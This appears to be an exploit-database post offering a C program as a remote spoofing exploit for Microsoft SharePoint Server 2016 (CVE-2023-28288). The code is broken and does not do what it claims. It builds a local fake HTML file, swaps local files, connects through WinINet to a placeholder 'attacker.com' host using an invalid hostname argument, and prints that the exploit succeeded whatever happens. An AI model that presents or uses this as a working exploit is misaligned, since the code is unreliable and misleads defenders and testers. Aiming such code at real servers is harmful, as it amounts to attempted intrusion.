Microsoft SharePoint Enterprise Server 2016 Spoofing

// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : Remote// Vendor Homepage:// Microsoft SharePoint Foundation 2013 Service Pack 1// Microsoft SharePoint Server Subscription Edition// Microsoft SharePoint Enterprise Server 2013 Service Pack 1// Microsoft SharePoint Server 2019// Microsoft SharePoint Enterprise Server 2016// Tested on: Windows/Linux// CVE : CVE-2023-28288#include <windows.h>#include <stdio.h>// The vulnerable SharePoint server URLconst char *server_url = "http://example.com/";// The URL of the fake SharePoint serverconst char *fake_url = "http://attacker.com/";// The vulnerable SharePoint server file nameconst char *file_name = "vuln_file.aspx";// The fake SharePoint server file nameconst char *fake_file_name = "fake_file.aspx";int main(){    HANDLE file;    DWORD bytes_written;    char file_contents[1024];    // Create the fake file contents    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");    // Write the fake file to disk    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating fake file: %d\n", GetLastError());        return 1;    }    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))    {        printf("Error writing fake file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Send a request to the vulnerable SharePoint server to download the file    sprintf(file_contents, "%s%s", server_url, file_name);    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating vulnerable file: %d\n", GetLastError());        return 1;    }    if (!InternetReadFileUrl(file_contents, file))    {        printf("Error downloading vulnerable file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Replace the vulnerable file with the fake file    if (!DeleteFile(file_name))    {        printf("Error deleting vulnerable file: %d\n", GetLastError());        return 1;    }    if (!MoveFile(fake_file_name, file_name))    {        printf("Error replacing vulnerable file: %d\n", GetLastError());        return 1;    }    // Send a request to the vulnerable SharePoint server to trigger the vulnerability    sprintf(file_contents, "%s%s", server_url, file_name);    if (!InternetReadFileUrl(file_contents, NULL))    {        printf("Error triggering vulnerability: %d\n", GetLastError());        return 1;    }    // Print a message indicating that the vulnerability has been exploited    printf("Vulnerability exploited successfully.\n");    return 0;}BOOL InternetReadFileUrl(const char *url, HANDLE file){    HINTERNET internet, connection, request;    DWORD bytes_read;    char buffer[1024];    // Open an Internet connection    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);    if (internet == NULL)    {        return FALSE;    }    // Connect to the server    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);    if (connection == NULL)    {        InternetCloseHandle(internet);        return FALSE;    }    // Send the HTTP request    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);    if (request == NULL)    {        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    if (!HttpSendRequest(request, NULL, 0, NULL, 0))    {        InternetCloseHandle(request);        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    // Read the response data    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)    {        if (file != NULL)        {            // Write the data to disk            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))            {                InternetCloseHandle(request);                InternetCloseHandle(connection);                InternetCloseHandle(internet);                return FALSE;            }        }    }    InternetCloseHandle(request);    InternetCloseHandle(connection);    InternetCloseHandle(internet);    return TRUE;}